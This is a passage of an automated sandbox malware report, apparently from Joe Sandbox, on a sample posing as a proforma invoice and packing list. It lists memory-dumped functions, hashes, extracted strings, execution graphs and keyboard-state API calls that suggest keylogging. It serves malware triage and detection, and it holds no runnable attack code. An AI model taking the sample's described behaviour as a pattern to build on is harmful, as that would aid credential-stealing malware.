                                                                                            • Opcode Fuzzy Hash: 543c9e8ca44ee4cff6dce75f159dd378a0497f176ac9382ee23a3cd06d870b4c
                                                                                            • Instruction Fuzzy Hash: 1EE0EC78905219CFDB54CF50C980BD8BBF5AB4A304F1484DAC409A7355D7369E86CF00

                                                                                            Non-executed Functions

                                                                                            Function 0B069DC8 Relevance: 7.6, APIs: 5, Instructions: 115keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000001), ref: 0B069E25
                                                                                            • GetKeyState.USER32(00000002), ref: 0B069E6A
                                                                                            • GetKeyState.USER32(00000004), ref: 0B069EAF
                                                                                            • GetKeyState.USER32(00000005), ref: 0B069EF4
                                                                                            • GetKeyState.USER32(00000006), ref: 0B069F39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: State
                                                                                            • String ID:
                                                                                            • API String ID: 1649606143-0
                                                                                            • Opcode ID: 8a78838e213ca7671388b3a5f06e7f823022921449e3cffe6160c5bf5a6c5709
                                                                                            • Instruction ID: ff1a6fd001095083992ccdf33f06257f5fa68cf2ed5e00ccbdf27cc88be2c1e5
                                                                                            • Opcode Fuzzy Hash: 8a78838e213ca7671388b3a5f06e7f823022921449e3cffe6160c5bf5a6c5709
                                                                                            • Instruction Fuzzy Hash: B941A370D05799CEDB14CF99C5483AFBFF4AB04348F20845AD089A7690C7B95689CFA1
                                                                                            Function 0B069DD8 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000001), ref: 0B069E25
                                                                                            • GetKeyState.USER32(00000002), ref: 0B069E6A
                                                                                            • GetKeyState.USER32(00000004), ref: 0B069EAF
                                                                                            • GetKeyState.USER32(00000005), ref: 0B069EF4
                                                                                            • GetKeyState.USER32(00000006), ref: 0B069F39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: State
                                                                                            • String ID:
                                                                                            • API String ID: 1649606143-0
                                                                                            • Opcode ID: 1707d240e3062bd02c7d321aa9ba105c3d61ceed3112a884f8d8b5dea152747a
                                                                                            • Instruction ID: bbd6d0738cd9200d80c88d9e51f7201c1f20942c4f0d1761d20d62e6b896d39c
                                                                                            • Opcode Fuzzy Hash: 1707d240e3062bd02c7d321aa9ba105c3d61ceed3112a884f8d8b5dea152747a
                                                                                            • Instruction Fuzzy Hash: 66419270D04799CEDB24DF99C5483AFFFF4AB04348F20845AD089A7690C7B99689CFA5
                                                                                            Function 053C5F30 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$:$pbq$~
                                                                                            • API String ID: 0-999388165
                                                                                            • Opcode ID: 7286018a3c5064a20968834bbf36002fed72b64eb173fd4a0e015744682761d2
                                                                                            • Instruction ID: 38a35c9631d2cbc6735a5875d9c7f07cd324c9781a9eef26157216d19f11f13d
                                                                                            • Opcode Fuzzy Hash: 7286018a3c5064a20968834bbf36002fed72b64eb173fd4a0e015744682761d2
                                                                                            • Instruction Fuzzy Hash: E742D275A04218DFDB15CFA9C980F99BBB2FF48304F1580E9E509AB266DB31AD91DF10
                                                                                            Function 053CF4A0 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f7bef9bd934a2d929e91a7841d54f1590dcb07f681ffa9a224f1405692afcb19
                                                                                            • Instruction ID: ccb59a08511b735189ab88c81e81462236811a7dc32236160df2f62f17b63de9
                                                                                            • Opcode Fuzzy Hash: f7bef9bd934a2d929e91a7841d54f1590dcb07f681ffa9a224f1405692afcb19
                                                                                            • Instruction Fuzzy Hash: 11E1E9B4E142598FCB14DFA9C5809AEFBB2BF89305F248169D414AB355DB34AD82CF60
                                                                                            Function 053CF8D8 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 316b1119bbdb030412bf6cefce52bc7acc99591268c957d4396bc97f4a49763b
                                                                                            • Instruction ID: 566bab7db673deef627e15c504deab0c348fc7f5dda8a97803fefd07d90e3a6a
                                                                                            • Opcode Fuzzy Hash: 316b1119bbdb030412bf6cefce52bc7acc99591268c957d4396bc97f4a49763b
                                                                                            • Instruction Fuzzy Hash: EAE1FBB4E142598FCB14DFA9C5809AEFBB2BF89305F24C159D814AB356DB30AD42CF60
                                                                                            Function 07270F38 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbf6b781b0d0ea2720545ee61dda0e6dcb8b23340e5bf11dd77e62b34edeb4bd
                                                                                            • Instruction ID: 36771934d48d689685de345d8a89991797aba14a45efc7d88268f7985bcb7156
                                                                                            • Opcode Fuzzy Hash: cbf6b781b0d0ea2720545ee61dda0e6dcb8b23340e5bf11dd77e62b34edeb4bd
                                                                                            • Instruction Fuzzy Hash: 52E1EAB4E102598FCB14DFA9C5809AEFBB2FF89305F24C169D414AB356D731A942CF60
                                                                                            Function 07271370 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f475c7b34559e6f8ee3c188f05a9be3600edeb40f1f34c8e89f5cd54c9a6fcc
                                                                                            • Instruction ID: 34806e507a787ace752780dedd8b2d767fcbb9d059c10a90d1e9c8c41aad9012
                                                                                            • Opcode Fuzzy Hash: 9f475c7b34559e6f8ee3c188f05a9be3600edeb40f1f34c8e89f5cd54c9a6fcc
                                                                                            • Instruction Fuzzy Hash: 7FE1F9B4E102598FCB14DFA9C5809AEFBB2BF89305F24C169E415AB356D730AD42CF61
                                                                                            Function 053CF051 Relevance: .3, Instructions: 301COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d246b96e44544771b6418a913f7a2930e17705a17085a1f58a1ff89eb6dbc0d8
                                                                                            • Instruction ID: ad57ecd0e53ac12585f5a4a271433dbcfbb6e5e974f73557d10c77d63dee5ab3
                                                                                            • Opcode Fuzzy Hash: d246b96e44544771b6418a913f7a2930e17705a17085a1f58a1ff89eb6dbc0d8
                                                                                            • Instruction Fuzzy Hash: 59D11A74E102598FCB14DFA9C5809AEFBB2BF49305F24C299D415AB356DB30AD82CF60
                                                                                            Function 04DE4D40 Relevance: .3, Instructions: 274COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5b9fce8a612566d202d29dc4f096f2a43d37dee3ec33e13837d4a48540e6db7
                                                                                            • Instruction ID: 32c9c11106c43291e3f5c247fab91924858c6acd373ca927ae3b4a7c0627709a
                                                                                            • Opcode Fuzzy Hash: c5b9fce8a612566d202d29dc4f096f2a43d37dee3ec33e13837d4a48540e6db7
                                                                                            • Instruction Fuzzy Hash: C3C1F670E01228DFDB24DFA9D884BEDBBB2BF49304F149599E408A7251DB34AA85CF51
                                                                                            Function 04DE4780 Relevance: .3, Instructions: 269COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8736d9454f2729a331d05ffef7ee1e4f83e1b04034631709776c896937e7ae4f
                                                                                            • Instruction ID: 1175b1657dc3cbc36d7d8ed4e9a92ecf6c816e277f02f1f1408c4c6f3c0c16ec
                                                                                            • Opcode Fuzzy Hash: 8736d9454f2729a331d05ffef7ee1e4f83e1b04034631709776c896937e7ae4f
                                                                                            • Instruction Fuzzy Hash: 5ED1E335D2065ADADB10EBA4D990A9DB7B1EF95300F10C79AE10937225FF70AEC5CB81
                                                                                            Function 04DE4790 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 307b88e51199994715608e36e19106cb1176367e29b2c00818dbfbecf01cb303
                                                                                            • Instruction ID: 16d9ed939556ef44d543ec593cbb386dff6094c10e94a04f0eb700ef5023b8ed
                                                                                            • Opcode Fuzzy Hash: 307b88e51199994715608e36e19106cb1176367e29b2c00818dbfbecf01cb303
                                                                                            • Instruction Fuzzy Hash: CBD1E335D20A5ADADB10EB64D990A9DB7B1EF95300F10C79AE10937225FF70AEC5CB81
                                                                                            Function 00A5D69C Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d0833c8c842f8a89dcf4c5f560de1d1f3fce7c99d302e6967ab570dd4afeecc6
                                                                                            • Instruction ID: cfb70afcbf23839e3816d1ca53879a5249ab73155da75200165168d5fb34b2e9
                                                                                            • Opcode Fuzzy Hash: d0833c8c842f8a89dcf4c5f560de1d1f3fce7c99d302e6967ab570dd4afeecc6
                                                                                            • Instruction Fuzzy Hash: 48A14B36A006099FCF05DFB4C9449DEB7B2FF89301B25857AE805AB265DB31ED5ACB40
                                                                                            Function 053CF490 Relevance: .1, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1d56dda3855f2b74d038a56f28f7e25558828c3e0953e0cac603abb376152f0
                                                                                            • Instruction ID: 0e1cfeda419f7bd75f2f6c322d1db9546df69ad727e59a0e24d07ecf41f6c662
                                                                                            • Opcode Fuzzy Hash: a1d56dda3855f2b74d038a56f28f7e25558828c3e0953e0cac603abb376152f0
                                                                                            • Instruction Fuzzy Hash: 94511FB4D142598FCB14DFA9C5805AEFBF2BF89304F24C1AAD414A7216D7319D42CF61
                                                                                            Function 053CF053 Relevance: .1, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b19da1a073f9addb7528c335557e9b93023b64e9335142d115b4a220fef51abc
                                                                                            • Instruction ID: 7f6ccdb3e3d430b503493856107046ebd98cca56ed3729a743fc75ddc58d63a1
                                                                                            • Opcode Fuzzy Hash: b19da1a073f9addb7528c335557e9b93023b64e9335142d115b4a220fef51abc
                                                                                            • Instruction Fuzzy Hash: A4510B75E142598BCB14CFA9C9805AEFBB2BF89304F2481A9D418A7216DB349D42CFA1
                                                                                            Function 053C5F23 Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772980852.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_53c0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2492c9f2a33a307a85d426355d3cf7536adcb5764e82fbba392c2769b7f434d2
                                                                                            • Instruction ID: 060af27c24a14179250b7186fed0a880f1a2793ce9631be7d72885a13ade3c28
                                                                                            • Opcode Fuzzy Hash: 2492c9f2a33a307a85d426355d3cf7536adcb5764e82fbba392c2769b7f434d2
                                                                                            • Instruction Fuzzy Hash: 0941B771E016188BEB58CF6AD9407DABBF3AFC9200F14C1AAD409A7214EB309A85CF51
                                                                                            Function 0B069080 Relevance: .1, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cde613917b620a6d155dc4d422318d85aacbf2c8df336414f72aec2caf62d8e5
                                                                                            • Instruction ID: 0923695a1d2fa67a72c720f9109c26b22d154c615880ef0f5d5956d7dfbc3c42
                                                                                            • Opcode Fuzzy Hash: cde613917b620a6d155dc4d422318d85aacbf2c8df336414f72aec2caf62d8e5
                                                                                            • Instruction Fuzzy Hash: EB310F74D05219CFCB05CFA8D548AEEBBF1AF49300F2541AAE405BB361DB359A45CFA0
                                                                                            Function 0B069090 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 04f87af1656f2e862727927f22ea063d4bf21093c6e07f870432726f7a7006fd
                                                                                            • Instruction ID: a79129a30d06141c9c4bb166a46a0e9f54f09a723b7df932867b0a04110f97a8
                                                                                            • Opcode Fuzzy Hash: 04f87af1656f2e862727927f22ea063d4bf21093c6e07f870432726f7a7006fd
                                                                                            • Instruction Fuzzy Hash: 2E31CD74D01219CFCB44DFA8D548AEEBBF1BF49301F6441AAE405BB361DB359A41CBA4

                                                                                            Execution Graph

                                                                                            Execution Coverage:17.4%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:11.4%
                                                                                            Total number of Nodes:35
                                                                                            Total number of Limit Nodes:5
                                                                                            execution_graph 18166 269e138 18167 269e144 18166->18167 18172 6582568 18167->18172 18169 269e229 18173 658258a 18172->18173 18174 269e1e3 18173->18174 18183 6589318 18173->18183 18189 6589548 18173->18189 18195 658992c 18173->18195 18201 6589328 18173->18201 18179 658f3b8 18174->18179 18180 658f3da 18179->18180 18181 6589548 2 API calls 18180->18181 18182 658f4a4 18180->18182 18181->18182 18182->18169 18184 658933a 18183->18184 18188 658933f 18183->18188 18184->18174 18185 6589924 LdrInitializeThunk 18185->18184 18187 6589328 LdrInitializeThunk 18187->18188 18188->18184 18188->18185 18188->18187 18193 6589579 18189->18193 18190 65896d9 18190->18174 18191 6589924 LdrInitializeThunk 18191->18190 18193->18190 18193->18191 18194 6589328 LdrInitializeThunk 18193->18194 18194->18193 18196 65897e3 18195->18196 18198 6589924 LdrInitializeThunk 18196->18198 18200 6589328 LdrInitializeThunk 18196->18200 18199 6589a81 18198->18199 18199->18174 18200->18196 18202 658933f 18201->18202 18203 658933a 18201->18203 18202->18203 18204 6589a69 LdrInitializeThunk 18202->18204 18203->18174 18204->18203 18205 6589c70 18206 6589c9d 18205->18206 18207 6589328 LdrInitializeThunk 18206->18207 18208 658bb7f 18206->18208 18209 6589fa6 18206->18209 18207->18209 18209->18208 18210 6589328 LdrInitializeThunk 18209->18210 18210->18209

                                                                                            Executed Functions

                                                                                            Function 02696FC8 Relevance: 6.7, Strings: 5, Instructions: 498COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 142 2696fc8-2696ffe 143 2697006-269700c 142->143 290 2697000 call 2697118 142->290 291 2697000 call 2696fc8 142->291 292 2697000 call 26969a0 142->292 144 269705c-2697060 143->144 145 269700e-2697012 143->145 148 2697062-2697071 144->148 149 2697077-269708b 144->149 146 2697021-2697028 145->146 147 2697014-2697019 145->147 150 26970fe-269713b 146->150 151 269702e-2697035 146->151 147->146 152 269709d-26970a7 148->152 153 2697073-2697075 148->153 154 2697093-269709a 149->154 287 269708d call 269a0e8 149->287 288 269708d call 2699de0 149->288 289 269708d call 2699dd0 149->289 164 269713d-2697143 150->164 165 2697146-2697166 150->165 151->144 157 2697037-269703b 151->157 155 26970a9-26970af 152->155 156 26970b1-26970b5 152->156 153->154 159 26970bd-26970f7 155->159 156->159 160 26970b7 156->160 161 269704a-2697051 157->161 162 269703d-2697042 157->162 159->150 160->159 161->150 163 2697057-269705a 161->163 162->161 163->154 164->165 170 2697168 165->170 171 269716d-2697174 165->171 173 26974fc-2697505 170->173 174 2697176-2697181 171->174 175 269750d-2697519 174->175 176 2697187-269719a 174->176 183 269751b-2697549 175->183 184 2697584-269759a 175->184 181 269719c-26971aa 176->181 182 26971b0-26971cb 176->182 181->182 190 2697484-269748b 181->190 193 26971cd-26971d3 182->193 194 26971ef-26971f2 182->194 191 269754b-2697550 183->191 192 2697552-2697556 183->192 196 269759c-26975ab 184->196 197 26975e4 184->197 190->173 201 269748d-269748f 190->201 198 269755c-269755d 191->198 192->198 199 26971dc-26971df 193->199 200 26971d5 193->200 202 26971f8-26971fb 194->202 203 269734c-2697352 194->203 196->197 221 26975ad-26975b3 196->221 204 26975e9-26975eb 197->204 206 2697212-2697218 199->206 207 26971e1-26971e4 199->207 200->199 200->203 205 269743e-2697441 200->205 200->206 208 269749e-26974a4 201->208 209 2697491-2697496 201->209 202->203 211 2697201-2697207 202->211 203->205 210 2697358-269735d 203->210 217 2697508 205->217 218 2697447-269744d 205->218 219 269721a-269721c 206->219 220 269721e-2697220 206->220 213 26971ea 207->213 214 269727e-2697284 207->214 208->175 215 26974a6-26974ab 208->215 209->208 210->205 211->203 216 269720d 211->216 213->205 214->205 224 269728a-2697290 214->224 222 26974ad-26974b2 215->222 223 26974f0-26974f3 215->223 216->205 217->175 225 269744f-2697457 218->225 226 2697472-2697476 218->226 227 269722a-2697233 219->227 220->227 231 26975b5 221->231 232 26975b7-26975c3 221->232 222->217 235 26974b4 222->235 223->217 234 26974f5-26974fa 223->234 236 2697292-2697294 224->236 237 2697296-2697298 224->237 225->175 228 269745d-269746c 225->228 226->190 233 2697478-269747e 226->233 229 2697235-2697240 227->229 230 2697246-269726e 227->230 228->182 228->226 229->205 229->230 262 2697362-2697398 230->262 263 2697274-2697279 230->263 239 26975c5-26975de 231->239 232->239 233->174 233->190 234->173 234->201 240 26974bb-26974c0 235->240 238 26972a2-26972b9 236->238 237->238 253 26972bb-26972d4 238->253 254 26972e4-269730b 238->254 239->197 259 26975e0-26975e2 239->259 245 26974e2-26974e4 240->245 246 26974c2-26974c4 240->246 245->217 250 26974e6-26974e9 245->250 247 26974d3-26974d9 246->247 248 26974c6-26974cb 246->248 247->175 252 26974db-26974e0 247->252 248->247 250->223 252->245 256 26974b6-26974b9 252->256 253->262 267 26972da-26972df 253->267 254->217 266 2697311-2697314 254->266 256->217 256->240 259->204 270 269739a-269739e 262->270 271 26973a5-26973ad 262->271 263->262 266->217 269 269731a-2697343 266->269 267->262 269->262 286 2697345-269734a 269->286 273 26973bd-26973c1 270->273 274 26973a0-26973a3 270->274 271->217 272 26973b3-26973b8 271->272 272->205 276 26973e0-26973e4 273->276 277 26973c3-26973c9 273->277 274->271 274->273 279 26973ee-269740d call 26976f1 276->279 280 26973e6-26973ec 276->280 277->276 278 26973cb-26973d3 277->278 278->217 282 26973d9-26973de 278->282 283 2697413-2697417 279->283 280->279 280->283 282->205 283->205 284 2697419-2697435 283->284 284->205 286->262 287->154 288->154 289->154 290->143 291->143 292->143
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                            • API String ID: 0-2525668591
                                                                                            • Opcode ID: e0647035e1bda45a7507f9855a08cfbcb12138c1612e4b5a793412dbda8f6ab7
                                                                                            • Instruction ID: 1891e4284dea24d8f84fe8ff4b19ef679b64da92d02fcfa519067232388e14bc
                                                                                            • Opcode Fuzzy Hash: e0647035e1bda45a7507f9855a08cfbcb12138c1612e4b5a793412dbda8f6ab7
                                                                                            • Instruction Fuzzy Hash: D6123BB0A10109DFCF16CF69D984AADFBBABF89704F158069E8059B365DB30ED41CB50
                                                                                            Function 02699DE0 Relevance: 6.1, Strings: 4, Instructions: 1135COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                            • API String ID: 0-183542557
                                                                                            • Opcode ID: 95b3f7110c7b6e13fc598d2d139b438a5d46fcae6c419f8ad583c035e9cc0a30
                                                                                            • Instruction ID: 3e2f016fe3ab3b53693f6d1816d45c4ea4092555680e5a74935bbb52aa611bd6
                                                                                            • Opcode Fuzzy Hash: 95b3f7110c7b6e13fc598d2d139b438a5d46fcae6c419f8ad583c035e9cc0a30
                                                                                            • Instruction Fuzzy Hash: F4A24B71A002099FCF15CFA8C584AAEBBFABF88314F15856AE405DB365DB35ED42CB50
                                                                                            Function 026929EC Relevance: 5.3, Strings: 4, Instructions: 313COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 734 26929ec-26929f6 736 26929f8-2692a3b 734->736 737 2692981-2692999 734->737 743 2692a5d-2692aac 736->743 744 2692a3d-2692a5c 736->744 740 26929a0-26929c8 737->740 748 2692aae-2692ab5 743->748 749 2692ac7-2692acf 743->749 750 2692abe-2692ac5 748->750 751 2692ab7-2692abc 748->751 752 2692ad2-2692ae6 749->752 750->752 751->752 755 2692ae8-2692aef 752->755 756 2692afc-2692b04 752->756 757 2692af1-2692af3 755->757 758 2692af5-2692afa 755->758 759 2692b06-2692b0a 756->759 757->759 758->759 761 2692b6a-2692b6d 759->761 762 2692b0c-2692b21 759->762 763 2692b6f-2692b84 761->763 764 2692bb5-2692bbb 761->764 762->761 770 2692b23-2692b26 762->770 763->764 774 2692b86-2692b8a 763->774 765 2692bc1-2692bc3 764->765 766 26936b6 764->766 765->766 768 2692bc9-2692bce 765->768 771 26936bb-26936f0 766->771 772 2693664-2693668 768->772 773 2692bd4 768->773 775 2692b28-2692b2a 770->775 776 2692b45-2692b63 call 26902c8 770->776 792 269371f-2693874 771->792 793 26936f2-269371a 771->793 778 269366a-269366d 772->778 779 269366f-26936b5 772->779 773->772 780 2692b8c-2692b90 774->780 781 2692b92-2692bb0 call 26902c8 774->781 775->776 782 2692b2c-2692b2f 775->782 776->761 778->771 778->779 780->764 780->781 781->764 782->761 786 2692b31-2692b43 782->786 786->761 786->776 796 26938a6-26938bc 792->796 797 2693876-2693881 792->797 793->792 799 26938ee-26938f4 796->799 800 26938be-26938c4 796->800 797->796 802 26938f6-269390c 799->802 805 2693928-269393d 799->805 800->802 803 26938c6-26938d1 800->803 806 269393e-2693969 802->806 807 269390e-2693919 802->807 803->799 805->806 807->805
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                            • API String ID: 0-2732225958
                                                                                            • Opcode ID: 493c66580bb7dd5b62ac8ed7ca7a31a229c09050551472619eedf20f11d38c50
                                                                                            • Instruction ID: b5ee3d9ae26bd307cde910ee0d44aa9094e521f3a658b043ca508a9facbf313a
                                                                                            • Opcode Fuzzy Hash: 493c66580bb7dd5b62ac8ed7ca7a31a229c09050551472619eedf20f11d38c50
                                                                                            • Instruction Fuzzy Hash: 14C19131A042568BCF1ACF78CBA165AFBFDEB89304F1454DAC8059B391DF319A92CB41
                                                                                            Function 026969A0 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (o^q$Hbq
                                                                                            • API String ID: 0-662517225
                                                                                            • Opcode ID: 3ab98204a0c93421398abaeb70d2e523bb1f91cfb6ba9061da887047972aadb8
